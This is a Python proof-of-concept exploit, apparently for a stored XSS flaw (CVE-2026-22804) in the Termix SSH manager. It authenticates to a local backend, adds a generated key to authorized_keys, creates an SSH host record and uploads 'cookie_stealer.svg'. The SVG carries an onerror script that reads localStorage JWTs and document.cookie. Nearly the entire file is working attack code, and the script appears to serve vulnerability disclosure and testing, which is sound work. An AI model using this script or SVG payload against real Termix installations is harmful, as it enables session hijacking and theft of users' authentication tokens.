# README.md
# Rendering markdown...
import requests
import json
import base64
import time
import sys
import argparse
import os
import subprocess
# Base URL used in this script for the user endpoints (/users/login,
# /users/create) and the SSH host records endpoint (/ssh/db/host).
BASE_URL_AUTH = "http://localhost:30001"
# Base URL used in this script for the file-manager endpoints
# (/ssh/file_manager/ssh/connect, .../status, .../uploadFile).
BASE_URL_FILE = "http://localhost:30004"
def parse_args(argv=None):
    """Parse the command-line options of the script.

    Args:
        argv: Optional list of argument strings. When ``None`` (the default)
            argparse falls back to ``sys.argv[1:]``, which matches the
            behaviour of the original zero-argument call.

    Returns:
        argparse.Namespace with two attributes:
        ``user`` (``--user``, default ``"admin"``) and
        ``password`` (``--pass``, default ``"password123"``).
    """
    parser = argparse.ArgumentParser(description="Termix XSS Exploit")
    parser.add_argument("--user", default="admin", help="Username for Termix auth")
    parser.add_argument(
        "--pass",
        dest="password",  # "pass" is a Python keyword, so store it under another name
        default="password123",
        help="Password for Termix auth",
    )
    return parser.parse_args(argv)
def _login(session, username, password):
    """POST the credentials to the login endpoint and record the token.

    On HTTP 200 the ``token`` field of the JSON reply (when present) is
    installed on ``session`` as an ``Authorization: Bearer`` header.

    Returns:
        ``(True, user_id)`` on HTTP 200, where ``user_id`` is the ``userId``
        field of the reply (``None`` if absent); ``(False, None)`` otherwise.
    """
    res = session.post(
        f"{BASE_URL_AUTH}/users/login",
        json={"username": username, "password": password},
    )
    if res.status_code != 200:
        return False, None
    body = res.json()
    token = body.get("token")
    if token:
        session.headers.update({"Authorization": f"Bearer {token}"})
    else:
        # Avoid sending a literal "Bearer None" header when no token came back.
        print("[!] Login response contained no token; Authorization header not set")
    return True, body.get("userId")


def login_or_register(username, password):
    """Log in with the given credentials, registering the account if needed.

    A login is attempted first. If it does not return HTTP 200, the account
    is created through ``/users/create`` and the login is repeated.

    Args:
        username: Account name to authenticate as.
        password: Password for that account.

    Returns:
        ``(session, user_id)`` where ``session`` is a ``requests.Session``
        and ``user_id`` is the ``userId`` value of the login reply.

    Exits the process with status 1 when the backend is unreachable, when
    registration is rejected, when the login after registration fails, or
    when any other error occurs during registration.
    """
    session = requests.Session()

    try:
        print(f"[*] Attempting to login as {username}...")
        logged_in, user_id = _login(session, username, password)
    except requests.exceptions.ConnectionError:
        print(f"[!] Could not connect to {BASE_URL_AUTH}. Is the backend running?")
        sys.exit(1)

    if logged_in:
        print("[+] Login successful")
        return session, user_id
    print("[-] Login failed, attempting registration...")

    try:
        res = session.post(
            f"{BASE_URL_AUTH}/users/create",
            json={"username": username, "password": password},
        )
        if res.status_code not in (200, 201):
            print(f"[!] Registration failed: {res.text}")
            sys.exit(1)
        print("[+] Registration successful")
        logged_in, user_id = _login(session, username, password)
    except Exception as e:
        # SystemExit is not an Exception subclass, so the exit above passes through.
        print(f"[!] Error: {e}")
        sys.exit(1)

    if not logged_in:
        # Previously the second login's status was never checked.
        print("[!] Login after registration failed")
        sys.exit(1)
    return session, user_id
def _ensure_poc_key(key_path):
    """Make sure the PoC SSH key pair exists and is authorised; return the private key.

    If ``key_path`` does not exist, an RSA key pair without passphrase is
    generated there with ``ssh-keygen``. If the matching ``.pub`` file exists
    and its content is not yet in the current user's
    ``~/.ssh/authorized_keys``, it is appended to that file.

    Returns:
        The text of the private key file.

    Exits the process with status 1 when ``ssh-keygen`` cannot be run or fails.
    """
    if not os.path.exists(key_path):
        print(f"[*] generating ssh key: {key_path}")
        key_dir = os.path.dirname(key_path)
        if key_dir:
            os.makedirs(key_dir, exist_ok=True)
        try:
            subprocess.run(
                ["ssh-keygen", "-f", key_path, "-t", "rsa", "-N", ""],
                check=True,
            )
        except (OSError, subprocess.CalledProcessError) as e:
            print(f"[!] ssh-keygen failed: {e}")
            sys.exit(1)

    pub_key_path = f"{key_path}.pub"
    auth_keys_path = os.path.expanduser("~/.ssh/authorized_keys")
    if os.path.exists(pub_key_path):
        with open(pub_key_path, "r") as f:
            pub_key = f.read().strip()
        os.makedirs(os.path.dirname(auth_keys_path), exist_ok=True)
        current_keys = ""
        if os.path.exists(auth_keys_path):
            with open(auth_keys_path, "r") as f:
                current_keys = f.read()
        # Substring check keeps repeated runs from appending the key again.
        if pub_key not in current_keys:
            print("[*] Adding generated key to authorized_keys...")
            with open(auth_keys_path, "a") as f:
                f.write(f"\n{pub_key}\n")

    with open(key_path, "r") as f:
        return f.read()


def get_or_create_host(session, user_id):
    """Create a fresh "Localhost PoC Custom" SSH host record and return it.

    The existing hosts are listed first; the first one carrying the target
    name is deleted so the record is always re-created from scratch. A local
    key pair is prepared and the host is then created with key authentication
    against 127.0.0.1:22.

    Args:
        session: Authenticated ``requests.Session``.
        user_id: Value sent as ``userId`` in the host record.

    Returns:
        The parsed JSON body of the create response, or ``None`` when listing
        the hosts does not return HTTP 200.

    Exits the process with status 1 when the host list is not valid JSON,
    when key generation fails, or when the create request is rejected.
    """
    print("[*] getting SSH hosts...")
    res = session.get(f"{BASE_URL_AUTH}/ssh/db/host")
    if res.status_code != 200:
        print(f"[-] Failed to get hosts. Status: {res.status_code}, Body: {res.text}")
        return None
    try:
        hosts = res.json()
    except ValueError:
        # json.JSONDecodeError is a ValueError; catching the base class also
        # covers the decode errors raised by other JSON backends of requests.
        print(f"[-] JSON Decode Error. Body: {res.text}")
        sys.exit(1)

    target_host_name = "Localhost PoC Custom"
    stale_host = next(
        (
            h
            for h in hosts or []
            if isinstance(h, dict) and h.get("name") == target_host_name
        ),
        None,
    )
    if stale_host is not None:
        print(f"[+] Found existing custom host: {stale_host['name']}. Deleting to ensure clean state...")
        del_res = session.delete(f"{BASE_URL_AUTH}/ssh/db/host/{stale_host['id']}")
        if del_res.status_code != 200:
            print(f"[-] Failed to delete host: {del_res.status_code}")
        print("[*] Re-creating custom host...")
    else:
        print("[*] Custom host not found. Creating it...")

    key_path = "/home/kali/CVE-2026-22804/poc_key"
    private_key = _ensure_poc_key(key_path)

    host_data = {
        "userId": user_id,
        "name": target_host_name,
        "ip": "127.0.0.1",
        "port": 22,
        "username": "kali",
        "authType": "key",
        "key": private_key,
        "tags": ["poc"],
        "pin": 0,
        "enableTerminal": 1,
        "enableFileManager": 1,
        "enableTunnel": 0,
        "forceKeyboardInteractive": False,
    }
    res = session.post(f"{BASE_URL_AUTH}/ssh/db/host", json=host_data)
    if res.status_code in (200, 201):
        print("[+] Created localhost host.")
        return res.json()
    print(f"[!] Failed to create host: {res.status_code} {res.text}")
    sys.exit(1)
def connect_ssh(session, host):
    """Open a file-manager SSH session for ``host`` and confirm it is connected.

    The connect request is sent, then after a two-second pause the status
    endpoint is queried for the same session id.

    Args:
        session: Authenticated ``requests.Session``.
        host: Host record; ``id``, ``name``, ``ip``, ``port``, ``username``
            and ``authType`` are required, ``userId``, ``key`` and
            ``password`` are optional.

    Returns:
        The session id (``str(host['id'])``) when the status endpoint reports
        ``connected``; ``None`` on every failure path (connect rejected,
        status not connected, or an exception during the exchange).
    """
    print(f"[*] Connecting to {host['name']} ({host['ip']})...")
    host_id = host['id']
    session_id = str(host_id)
    payload = {
        "sessionId": session_id,
        "hostId": host_id,
        "ip": host['ip'],
        "port": host['port'],
        "username": host['username'],
        "authType": host['authType'],
        "userId": host.get('userId'),
    }
    if host.get('key'):
        payload['sshKey'] = host['key']
    if host.get('authType') == 'password':
        payload['password'] = host.get('password', 'kali')

    try:
        res = session.post(f"{BASE_URL_FILE}/ssh/file_manager/ssh/connect", json=payload)
        if res.status_code not in (200, 201):
            print(f"[-] Connect failed: {res.status_code} {res.text}")
            return None

        print(f"[+] SSH Connection initiated. Response: {res.text}")
        # Give the backend a moment to establish the session before polling.
        time.sleep(2)
        status_res = session.get(
            f"{BASE_URL_FILE}/ssh/file_manager/ssh/status",
            params={"sessionId": session_id},
        )
        print(f"[*] Status Check: {status_res.status_code} {status_res.text}")
        if status_res.status_code == 200 and status_res.json().get("connected"):
            print("[+] SSH Connected successfully!")
            return session_id

        print("[-] SSH Connection status is false. Maybe auth failed?")
        print(f"DEBUG: Session ID used: {session_id}")
        return None
    except Exception as e:
        # Best-effort boundary: report the problem and signal failure to the
        # caller instead of handing back a session id that was never opened.
        print(f"[!] Connection error: {e}")
        return None
def upload_poc(session, session_id, host_id, user_id):
    """Upload the proof-of-concept SVG through the file-manager upload endpoint.

    The file ``cookie_stealer.svg`` is written to ``/home/kali`` of the
    connected SSH session. The outcome is only printed; nothing is returned.

    Args:
        session: Authenticated ``requests.Session``.
        session_id: File-manager session id to upload through.
        host_id: Sent as ``hostId`` in the request body.
        user_id: Sent as ``userId`` in the request body.
    """
    svg_name = "cookie_stealer.svg"
    svg_markup = """<svg width="600" height="600" xmlns="http://www.w3.org/2000/svg">
<foreignObject width="100%" height="100%">
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="background-color:purple; color:white; font-size:24px; padding:20px; font-weight:bold; border: 5px solid black; font-family:monospace; overflow:hidden;">
SESSION HIJACKED! <br/>
<hr/>
<div style="font-size:16px;">
<strong>JWT (localStorage):</strong><br/>
<textarea id="jwt_area" style="width:100%; height:100px; color:black;">Loading...</textarea>
<br/>
<strong>Cookies:</strong><br/>
<textarea id="cookie_area" style="width:100%; height:50px; color:black;">Loading...</textarea>
</div>
</div>
<img src="x" onerror="
try {
let store = '';
for(let i=0; i<localStorage.length; i++) {
store += localStorage.key(i) + ': ' + localStorage.getItem(localStorage.key(i)) + '\\n';
}
document.getElementById('jwt_area').value = store || 'No localStorage found';
document.getElementById('cookie_area').value = document.cookie || 'No cookies found';
alert('Session Hijacking Successful!');
} catch(e) { alert('Error: ' + e); }
" style="display:none;" />
</body>
</foreignObject>
</svg>"""

    # Keyword form keeps the same keys in the same order as a dict literal.
    request_body = dict(
        sessionId=session_id,
        path="/home/kali",
        fileName=svg_name,
        content=svg_markup,
        hostId=host_id,
        userId=user_id,
    )

    print(f"[*] Uploading {svg_name}...")
    upload_url = f"{BASE_URL_FILE}/ssh/file_manager/ssh/uploadFile"
    reply = session.post(upload_url, json=request_body)

    if reply.status_code != 200:
        print(f"[-] Upload failed: {reply.status_code} {reply.text}")
        return

    print("[+] File uploaded successfully!")
    print(f"[+] Check File Manager at /home/kali/{svg_name} to verify XSS.")
def main():
    """Run the proof of concept end to end.

    Steps: parse the CLI options, authenticate, (re)create the local SSH
    host record, open a file-manager session and, if that succeeds, upload
    the SVG file.

    Exits with status 1 when no host record could be obtained.
    """
    args = parse_args()
    session, user_id = login_or_register(args.user, args.password)
    host = get_or_create_host(session, user_id)
    if not host:
        # get_or_create_host returns None when the host list cannot be
        # fetched; continuing would fail on host['name'] in connect_ssh.
        print("[!] No SSH host available; aborting.")
        sys.exit(1)
    session_id = connect_ssh(session, host)
    if session_id:
        upload_poc(session, session_id, host['id'], user_id)


if __name__ == "__main__":
    main()